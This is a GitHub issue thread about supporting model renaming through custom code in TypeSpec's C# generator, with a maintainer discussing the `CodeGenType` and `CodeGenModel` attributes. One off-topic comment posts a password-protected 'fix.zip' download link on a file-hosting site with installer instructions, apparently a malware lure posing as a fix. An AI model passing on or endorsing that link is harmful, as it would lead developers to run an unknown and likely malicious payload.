### ISSUE TITLE
Support rename model with custom code

### ISSUE THREAD

**Issue by m-nash** [microsoft/typespec#4256]
Support https://github.com/Azure/autorest.csharp/blob/feature/v3/readme.md#rename-a-model-class

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ArcturusZhang** [comment]
I only supported `CodeGenType`, which is quite universal that could the name and namespace of any generated type.
Do we still need the `CodeGenModel` attribute? Maybe we could remove it. The extra feature in the `CodeGenModel` attribute is that it could change or append usage to the model.
